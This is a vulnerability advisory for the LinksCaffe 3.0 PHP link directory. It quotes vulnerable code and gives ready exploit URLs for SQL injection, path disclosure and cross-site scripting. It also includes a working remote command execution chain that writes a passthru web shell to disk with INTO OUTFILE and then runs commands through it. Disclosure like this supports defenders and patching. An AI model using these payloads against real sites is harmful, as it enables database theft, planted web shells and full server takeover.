LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties
LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties
Produce : LinksCaffe 3.0
Website : http://gonafish.com/
Impact : manupulation of data / system access
Discovered by : Simo64 - Moroccan Security Team
[+] SQL injection
******************
[1]Vulnerable code in line 223 in links.php
code :
$rime = mysql_query("SELECT * from links WHERE link_val like 'yes' AND
cat_id LIKE '$cat' ORDER BY hits DESC, link_pop DESC, rate DESC LIMIT $offset,
$limit") or die(mysql_error());
$offset and $limit vars are not sanitized before to be used to conducte
sql injection attacks
Exploit :
http://localhost/linkscaffe/links.php?cat=1&offset=[SQL]
http://localhost/linkscaffe/links.php?cat=1&limit=[SQL]
[2] Vulnerable code in line 516 in links.php
code :
if (!$newdays)
{
$newdays=$daysnew;
}
else
{
$newdays=$newdays;
}
$rime1 = mysql_query("SELECT COUNT(*) from links WHERE (to_days(NOW())
- to_days(links.date)) <= $newdays AND link_val = 'yes'") or die(mysql_error());
Exploit :
http://localhost/linkscaffe/links.php?action=new&newdays=[SQL]
[3] Vulnerable code in line 516 in links.php
code :
if ($action=="deadlink")
{
........
$rime = mysql_query("SELECT * from links WHERE link_id=$link_id") or
die(mysql_error());
while($row = mysql_fetch_array($rime)) {
extract($row);
echo "<li><font class=text10><a href='$link_url'
target='_blank'>$link_name</a><br>$link_desc<br></font></li>";
echo "<input type = 'hidden' name = 'link_id' value='$link_id'><input
type = 'hidden' name = 'cat_id' value='$cat_id'><input type = 'hidden' name =
'link_name' value='$link_name'>
<input type = 'hidden' name = 'link_url' value='$link_url'><input type
= 'hidden' name = 'link_desc' value='$link_desc'><input type = 'hidden' name =
'link_email' value='$link_email'><br><input type = 'submit' value = 'Dead
Link'>";
}
$link_id var are not sanitized before to be used to conducte sql
injection attacks
Exploit :
http://localhost/linkscaffe/links.php?action=deadlink&link_id=[SQL]
[+] FullPath disclosure :
PoC :
http://localhost/linkscaffe/links.php?action=new&newdays=-1+UNION+SELECT+123456/*
Result :
Warning: Supplied argument is not a valid MySQL result resource in
/usr/home/simo64/linkscaffe/links.php on line 540
Warning: Supplied argument is not a valid MySQL result resource in
/usr/home/simo64/linkscaffe/links.php on line 549
Warning: Supplied argument is not a valid MySQL result resource in
/usr/home/simo64/linkscaffe/links.php on line 554
[+] Remote Command Execution
*****************************
if magic_quote_gpc == OFF we can create a shell in writable folder using (3)!!
Exploit :
http://localhost/linkscaffe/links.php?action=deadlink&link_id=-1+UNION+SELECT+0,0,0,0,'<?passthru(\$_GET[\'cmd\']);?>',0,0,0,0,0,0,0,0,0,0%20INTO%20OUTFILE%20'/usr/home/simo64/linkscaffe/pipo.php'/*
after we can exec cmds
http://localhost/linkscaffe/pipo.php?cmd=ls;id
[+] Cross Site Scripting
*************************
$tablewidth var in counter.php is not sanitized before to be used to conducte
xss attacks
$newdays var in links.php is not sanitized before to be used to conducte xss
attacks
$tableborder,$menucolor,$textcolor,$bodycolor vars in links.php are not
sanitized before to be used to conducte xss attacks
PoC :
http://localhost/linkscaffe/counter.php?tablewidth='%3E[XSS]<p+
http://localhost/linkscaffe/links.php?action=new&newdays=[XSS]
http://localhost/linkscaffe/menu.inc.php?tableborder='%3E[XSS]
http://localhost/linkscaffe/menu.inc.php?menucolor='%3E[XSS]
http://localhost/linkscaffe/menu.inc.php?textcolor='%3E[XSS]
http://localhost/linkscaffe/menu.inc.php?bodycolor='%3E[XSS]
Contact : simo64@xxxxxxxxx
greetz to all friends !